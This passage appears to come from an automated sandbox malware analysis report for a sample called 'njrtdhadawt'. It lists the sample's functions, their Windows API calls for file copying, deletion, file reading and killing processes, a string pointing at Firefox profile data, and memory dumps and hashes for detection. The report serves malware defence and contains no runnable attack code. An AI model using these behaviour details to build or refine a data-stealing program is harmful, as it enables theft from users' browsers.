                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 211194620-0
                                                                                                                                                                                                                                                          • Opcode ID: 83cf8b0a4f45b14328dd40a6f52970e1c5e22b0bf7adf70b41a9cf27d9cc5706
                                                                                                                                                                                                                                                          • Instruction ID: 246c50c74c87438f3b0dff39239ddf5e03cb1e2336df878996916ac360193d2b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83cf8b0a4f45b14328dd40a6f52970e1c5e22b0bf7adf70b41a9cf27d9cc5706
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C781A53290015D9BCF40FBB6ED469EEB775AF04301F614421FA00B7167DBA9BE06AB91
                                                                                                                                                                                                                                                          Function 00FEB46C Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00FEB511
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FEB663
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FEB67E
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00FEB6D0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 211194620-0
                                                                                                                                                                                                                                                          • Opcode ID: e140e7ceb40b091bb59ad58644843db6c4ff65c5619e323e1c2a6cbc880e037c
                                                                                                                                                                                                                                                          • Instruction ID: df9b60b906e37b6886d3575d751311801eba5bd55688adf71ae50c38f3f27319
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e140e7ceb40b091bb59ad58644843db6c4ff65c5619e323e1c2a6cbc880e037c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0871D83290015D9BCF40FBB6ED469EEB775AF04301F514421FA00B7166EBB9BE06AB91
                                                                                                                                                                                                                                                          Function 6CD63F0F Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1740715915-0
                                                                                                                                                                                                                                                          • Opcode ID: 1b2c967479369c5e3501ea2e6e8b3dd3746eaf2dccc3ba3d1688b424ba5a80d3
                                                                                                                                                                                                                                                          • Instruction ID: 79da5024ecd63b07e54d6973caccfa22e25411be30f0a4043c73e27f76d2ab2d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b2c967479369c5e3501ea2e6e8b3dd3746eaf2dccc3ba3d1688b424ba5a80d3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B51E476606612EFEB15CF56D860BAA77B4FF01319F20452DE89547EB0D731E884CBA0
                                                                                                                                                                                                                                                          Function 00FED5C2 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE862C
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8643
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CloseHandle.KERNEL32(?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8682
                                                                                                                                                                                                                                                            • Part of subcall function 00FF2042: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00FF6B0E,?), ref: 00FF205A
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,?,0101656C,010158CE), ref: 00FED653
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FED666
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                                                                                                          • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                                                                          • API String ID: 161838763-3310892237
                                                                                                                                                                                                                                                          • Opcode ID: cf9053e6b571e5468a18630d01a10e2d0702e7dfb669108a1b8ce39785f1210f
                                                                                                                                                                                                                                                          • Instruction ID: 16aa5e1e796fd27d3ab7a99a9f152d5e1f7ddc4d49932c37e507249e74c9ce7c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf9053e6b571e5468a18630d01a10e2d0702e7dfb669108a1b8ce39785f1210f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B41C93290015D9BCF50FBA6DD429DD77B4AF04300F420561FE44B7227EAA9BE09ABD1
                                                                                                                                                                                                                                                          Function 00FFB802 Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00FFB847
                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 00FFB85B
                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 00FFB8A8
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,00FFA8ED,?,00000001,?,?,?), ref: 00FFB8C7
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _memmove$FileWritemalloc
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 803809635-0
                                                                                                                                                                                                                                                          • Opcode ID: d280c6cf271d25060523b50f4a8100c1cc565ee31679610683562c24361fa0eb
                                                                                                                                                                                                                                                          • Instruction ID: f84e8e9bb39829a0703695c7a1ee737757faaab935820a9da098530ad69fb8b0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d280c6cf271d25060523b50f4a8100c1cc565ee31679610683562c24361fa0eb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56319E72A00708AFD721CF65C980AA6B7FCFF88750F44852EEA8687A10DB70F905DB50
                                                                                                                                                                                                                                                          Function 00FF2682 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF26A9
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1F84: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00FF26D3,?), ref: 00FF1F8F
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1F84: HeapAlloc.KERNEL32(00000000), ref: 00FF1F96
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1F84: wsprintfW.USER32 ref: 00FF1FA7
                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 00FF274F
                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00FF275D
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00FF2764
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$Heap$AllocCloseHandleOpenTerminate_memsetwsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2224742867-0
                                                                                                                                                                                                                                                          • Opcode ID: 105fdb600345f38635ca51b725dd8887c2eb5e4870ed4c85209326b81466581c
                                                                                                                                                                                                                                                          • Instruction ID: cba5009fe166d5feb5fd5f56c4604b3aa6a482f2d514db0cd082f2a11fea9d6b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 105fdb600345f38635ca51b725dd8887c2eb5e4870ed4c85209326b81466581c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD31FC72A0121CAFDB21AFA4DC889EEB7BDEF0A354F0440A6F605A2550D6359F849F52
                                                                                                                                                                                                                                                          Function 6CD66F1D Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 6CD682D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CD6A340,?,00000000,-00000008), ref: 6CD68332
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6CD66F81
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6CD66F88
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 6CD66FC2
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6CD66FC9
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1913693674-0
                                                                                                                                                                                                                                                          • Opcode ID: 52e87603caadc411b46a38f623849a14991c739965c665add0b80be6e5622cd0
                                                                                                                                                                                                                                                          • Instruction ID: c0fb37f3a763425eb9f77baf946fb4fb3b62700dacef46a400055dabc03577a7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52e87603caadc411b46a38f623849a14991c739965c665add0b80be6e5622cd0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01217171614219AFDB109F67C89089EB7E9EF45368F048619F914D7E60D731EC16CB60
